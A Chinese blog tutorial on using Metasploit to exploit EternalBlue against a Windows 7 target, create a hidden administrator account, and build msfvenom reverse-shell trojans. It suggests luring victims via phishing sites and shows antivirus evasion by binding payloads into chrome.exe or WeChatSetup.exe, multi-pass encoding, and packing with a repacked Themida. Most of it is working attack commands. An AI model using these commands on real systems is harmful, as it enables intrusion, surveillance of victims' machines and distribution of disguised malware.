【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)

2023-11-01 12:59

本文主要是介绍【P3】最强渗透工具 - metasploit(安装配置及使用教程详解),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

    • 一、metasploit 是什么?
    • 二、metasploit 攻击 windows 操作系统
    • 三、metasploit 攻击永恒之蓝全流程
    • 四、metasploit 攻击成功后能做什么
      • 4.1、操作步骤
      • 4.2、攻击示例
    • 五、msfvenom 绕过杀毒软件技巧
      • 5.1、捆绑木马
      • 5.2、加壳:压缩壳、加密壳
        • 5.2.1、Themida:加壳软件
          • 5.2.1.1、Linux 下安装 Themida
          • 5.2.1.2、windows 下安装 Themida
          • 5.2.1.2、Themida 使用教程


包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。


一、metasploit 是什么?

Kali 最强渗透工具 - metasploit

  • msf 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新

  • metasploit 让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击

二、metasploit 攻击 windows 操作系统

1、msfconsole:启动 metasploit 命令行 [命令行效率高,使用方便]

2、启动 metasploit 前需要做:

  • 打开 kali 终端

  • 使用 sudo su 命令,并输入 kali 的密码 kali,切换至 root 用户

  • 使用 msfdb init 命令初始化 metasploit 数据库(*可选)

3、操作步骤:

(1)、sudo su 切换到超级管理员 root 用户,密码 kali(无 root 用户需自行创建一个)

  • sudo su

在这里插入图片描述

(2)、msfconsole 启动 metasploit 命令行界面

  • msfconsole

在这里插入图片描述

三、metasploit 攻击永恒之蓝全流程

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件

1、使用模块:use exploit/windows/smb/ms17_010_eternalblue

2、设置必选项:查看必选项 [*required 为 yes 的就是必选项] show options

3、操作步骤

(1)、可以使用编号进行搜索模块,永恒之蓝编号被微软定义为 ms17_010

  • search ms17_010

在这里插入图片描述

  • exploit:漏洞攻击脚本

如图,可以通过 Description 查看模块是干什么的

(2)、使用模块

两种方法:

  • use 模块名称

  • use 模块编号

在这里插入图片描述

(3)、配置(设置)模块,可以先查看有哪些设置,告诉 msf 攻击谁,要干啥

  • show options

在这里插入图片描述

  • Required(必选项):只需要配置必选项为 yes 的即可

  • RHOSTS:地址

  • RPORT:端口,默认445

  • VERIFY_ARCH、VERIFY_TARGET:这两选项已经是配置好的,保持默认即可

  • Payload options:攻击载荷,默认 windows/x64/meterpreter/reverse_tcp:获取到目标机器的命令执行权限;攻击之后,你想干啥

  • EXITFUNC:默认已经配置好

  • LHOST:监听地址,攻击机的ip地址

  • LPORT:监听端口

(4)、启动靶机,win 7

  • 靶机安装参考:https://blog.csdn.net/qq_45138120/article/details/131350059

  • 靶机为 VMware 下的 Windows 虚拟机,Windows 版本无所谓

(5)、打开 cmd,使用 ipconfig 查看靶机 ip 地址

  • ipconfig

在这里插入图片描述

(6)、kali 设置攻击靶机地址

  • set RHOSTS 靶机ip

在这里插入图片描述

(7)、设置完毕后,可以再次使用 show options 查看是否配置齐全

  • show options

在这里插入图片描述

如图:查看 Required 配置项为 yes 的 Current Setting 当前设置是否为空,不为空即配置完毕

(8)、可以修改下默认的 LHOST 端口

  • set lport 22222

在这里插入图片描述

注:端口范围 0-65535


扩展:查看端口是否开放

① 查看445端口是否开启

  • netstat -an

在这里插入图片描述

② 此处攻击靶机一定要关闭防火墙

在这里插入图片描述


(9)、运行模块

  • run

在这里插入图片描述

如图,会自动进行攻击靶机,并且获取命名执行权限。攻击成功后,先打印 WIN 并进入 meterpreter

meterpreter:拿到了 Win 7 靶机的权限

(10)、可以使用 help 查看可以使用的命令

在这里插入图片描述

  • Command:命令

  • Description:命令的描述或解释

  • shutdown:关机

  • User interface Commands:用户接口命令

  • getdesktop:截图

  • keyscna:发送键盘指令

  • mouse:发送鼠标指令

(11)、退出

  • exit

在这里插入图片描述

四、metasploit 攻击成功后能做什么

1、攻击成功后能做什么

  • meterpreter 是强大的后渗透模块,可以输入 help 查看帮助信息

  • 远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统…这些看起来非常复杂又高级的操作都能用 meterpreter 中一行或几个字母,简单的命令完成

  • 例:创建后门用户并开启远程连接

    • shell

    • net user zhangsan 123456 /add && net localgroup administrators zhangsan /add

    • exit

    • run getgui -e

2、使用 Kali 渗透工具生成远控木马

(1)、msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线

  • venom:毒,毒液

  • [* msfvenom 在 shell 里使用,不是 msfconsole 终端]

(2)、windows 可执行程序后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

  • msfvenom:执行使用的工具

  • -p:payload

  • windows/x64/meterpreter/reverse_tcp:payload_name 系统/架构/作用/方式;如果要攻击 Linux,将 windows 换成 Linux 即可(android,mac)

  • lhost=192.168.123.136 Iport=9999:payload设置(kali 地址,kali 端口)

  • -f:format

  • exe:exe,windows 可执行文件(ipk,jar,war)

  • -o:output,输入的文件名,如 demo.exe

4.1、操作步骤

(1)、生成木马文件

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

在这里插入图片描述

(2)、如图,文件生成在当前路径下

  • 可以使用 ls 进行查看

  • 可以使用 pwd 查看工作目录的绝对路径

在这里插入图片描述

(3)、可以使用钓鱼网站等诱骗受害人点击

在这里插入图片描述

(4)、将木马下载到本地,demo.exe

拉取到本地时,一定要关闭杀毒软件

木马病毒下载到本地会被杀毒软件截取,后续需要让木马绕过杀毒软件

在这里插入图片描述

木马病毒不可以直接运行,就跟钓鱼一样,需要将木马放在鱼钩上

(5)、终端控制台进入 msfconsole

  • msfconsole

在这里插入图片描述

(6)、使用 exploit/multi/handler 模块

  • use exploit/multi/handler

在这里插入图片描述

(7)、查看设置

  • show options

  • 可简写:options

在这里插入图片描述

  • Payload options:攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)

(8)、设置攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)

  • set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

(9)、设置 kali 地址

  • set lhost 192.168.159.128

在这里插入图片描述

(10)、设置端口(设置成生成可执行程序后门时设置的 Iport,必须一致)

  • set lport 9999

在这里插入图片描述

(11)、可以使用 options 再次查看设置信息

在这里插入图片描述

(12)、运行

  • run

在这里插入图片描述

现在鱼钩已经扔河里了,等待鱼儿上钩,有两种方法:1、将鱼儿摁在勾上,利用漏洞;2、姜太公钓鱼,愿者上钩。诱导鱼儿上钩

(13)、假如受害者上钩,双击本地的 deom.exe 文件

在这里插入图片描述

(14)、如图,受害者已上钩

在这里插入图片描述

  • meterpreter:获取到受害者电脑的执行权限

(15)、输入 help,查看可以执行的命令操作

  • help

在这里插入图片描述

4.2、攻击示例

(1)、webcam_list,查看受害者电脑是否有摄像头

  • webcam_list

在这里插入图片描述

(2)、我使用的是台式机,所以没有摄像头

五、msfvenom 绕过杀毒软件技巧

最基础的免杀 [ 对于其他杀毒软件效果不同,具体情况请自行尝试]*

5.1、捆绑木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exemsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exemsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exemsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe- -x:模板(要使用哪一个正常程序的模板作为后门的生成)
注:如果 notepad++ 过不了,可以换其它软件;路径下必须存在可执行程序
- -e /指定编码方式对攻击载荷进行重新编码
- -x /指定木马捆绑在哪个可执行程序模板上
- -i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现
- -f /指定 msf 编码器输出程序的格式
- -o /指定处理完毕后的文件输出路径

注:使用捆绑木马时,路径下必须存在可执行程序

(1)、在生成木马的路径下,先复制一个可执行程序过去,比如:chrome.exe

在这里插入图片描述

(2)、使用 msfvenom 生成一个 Windows 环境下的木马,并捆绑到 chrome.exe 上生成 chrome01.exe 的合成马

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe

其它示例:

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

x86/shikata_ga_nai 进行多次编码的方式进行免杀处理

在这里插入图片描述

(3)、在此路径下,可以看到生成一个 chrome01.exe 的木马

在这里插入图片描述

5.2、加壳:压缩壳、加密壳

5.2.1、Themida:加壳软件
5.2.1.1、Linux 下安装 Themida
  • Themida Linux下rar包 百度网盘下载链接:https://pan.baidu.com/s/1v6q8y0Xg-SXMUXX4roEyJg?pwd=8fr8

  • 提取码:8fr8

注:此压缩包 rar包,必须在 Linux 系统下进行解压,使用需要在 windows 下使用


扩展:解压rar包

(1)、安装 rar 包教程参考:https://blog.csdn.net/weixin_40293999/article/details/122733513

(2)、解压rar包

在这里插入图片描述


5.2.1.2、windows 下安装 Themida
  • Themida windows下文件夹百度网盘下载链接:https://pan.baidu.com/s/1vGaNf92vzUZbsMlzMwXNFA?pwd=sfcx

  • 提取码:sfcx

  • 下载后得到名为 Themida_x32_x64_v3.0.4.0_Repacked 的文件夹

在这里插入图片描述

5.2.1.2、Themida 使用教程

在这里插入图片描述

注:Themida.exe为32位;Themida64.exe为64位

(1)、打开下载后的 Themida_x32_x64_v3.0.4.0_Repacked 文件夹,双击 Themida64.exe 执行文件

在这里插入图片描述

在这里插入图片描述

(2)、将未加壳的木马可执行程序拉到 Themida 软件中

在这里插入图片描述

在这里插入图片描述

  • 也可以在 Themida 软件中选择导入的木马文件路径

(3)、点击 Protext 进行加壳

注:加壳前,先将杀毒软件关闭,等加壳完成后再打开

在这里插入图片描述

自动进行加壳保护,成功后,在本地会生成一个添加 Protext 名称的文件

(4)、如图,加壳完成,点击 Close 即可

在这里插入图片描述

在这里插入图片描述

这篇关于【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/323150

相关文章

Python pandas库自学超详细教程

《Pythonpandas库自学超详细教程》文章介绍了Pandas库的基本功能、安装方法及核心操作,涵盖数据导入(CSV/Excel等)、数据结构(Series、DataFrame)、数据清洗、转换... 目录一、什么是Pandas库(1)、Pandas 应用(2)、Pandas 功能(3)、数据结构二、安

Python使用Tenacity一行代码实现自动重试详解

《Python使用Tenacity一行代码实现自动重试详解》tenacity是一个专为Python设计的通用重试库,它的核心理念就是用简单、清晰的方式,为任何可能失败的操作添加重试能力,下面我们就来看... 目录一切始于一个简单的 API 调用Tenacity 入门:一行代码实现优雅重试精细控制:让重试按我

Python安装Pandas库的两种方法

《Python安装Pandas库的两种方法》本文介绍了三种安装PythonPandas库的方法,通过cmd命令行安装并解决版本冲突,手动下载whl文件安装,更换国内镜像源加速下载,最后建议用pipli... 目录方法一:cmd命令行执行pip install pandas方法二:找到pandas下载库,然后

MySQL中EXISTS与IN用法使用与对比分析

《MySQL中EXISTS与IN用法使用与对比分析》在MySQL中,EXISTS和IN都用于子查询中根据另一个查询的结果来过滤主查询的记录,本文将基于工作原理、效率和应用场景进行全面对比... 目录一、基本用法详解1. IN 运算符2. EXISTS 运算符二、EXISTS 与 IN 的选择策略三、性能对比

SpringBoot多环境配置数据读取方式

《SpringBoot多环境配置数据读取方式》SpringBoot通过环境隔离机制,支持properties/yaml/yml多格式配置,结合@Value、Environment和@Configura... 目录一、多环境配置的核心思路二、3种配置文件格式详解2.1 properties格式(传统格式)1.

Python标准库之数据压缩和存档的应用详解

《Python标准库之数据压缩和存档的应用详解》在数据处理与存储领域,压缩和存档是提升效率的关键技术,Python标准库提供了一套完整的工具链,下面小编就来和大家简单介绍一下吧... 目录一、核心模块架构与设计哲学二、关键模块深度解析1.tarfile:专业级归档工具2.zipfile:跨平台归档首选3.

使用Python构建智能BAT文件生成器的完美解决方案

《使用Python构建智能BAT文件生成器的完美解决方案》这篇文章主要为大家详细介绍了如何使用wxPython构建一个智能的BAT文件生成器,它不仅能够为Python脚本生成启动脚本,还提供了完整的文... 目录引言运行效果图项目背景与需求分析核心需求技术选型核心功能实现1. 数据库设计2. 界面布局设计3

使用IDEA部署Docker应用指南分享

《使用IDEA部署Docker应用指南分享》本文介绍了使用IDEA部署Docker应用的四步流程:创建Dockerfile、配置IDEADocker连接、设置运行调试环境、构建运行镜像,并强调需准备本... 目录一、创建 dockerfile 配置文件二、配置 IDEA 的 Docker 连接三、配置 Do

Android Paging 分页加载库使用实践

《AndroidPaging分页加载库使用实践》AndroidPaging库是Jetpack组件的一部分,它提供了一套完整的解决方案来处理大型数据集的分页加载,本文将深入探讨Paging库... 目录前言一、Paging 库概述二、Paging 3 核心组件1. PagingSource2. Pager3.

idea的终端(Terminal)cmd的命令换成linux的命令详解

《idea的终端(Terminal)cmd的命令换成linux的命令详解》本文介绍IDEA配置Git的步骤:安装Git、修改终端设置并重启IDEA,强调顺序,作为个人经验分享,希望提供参考并支持脚本之... 目录一编程、设置前二、前置条件三、android设置四、设置后总结一、php设置前二、前置条件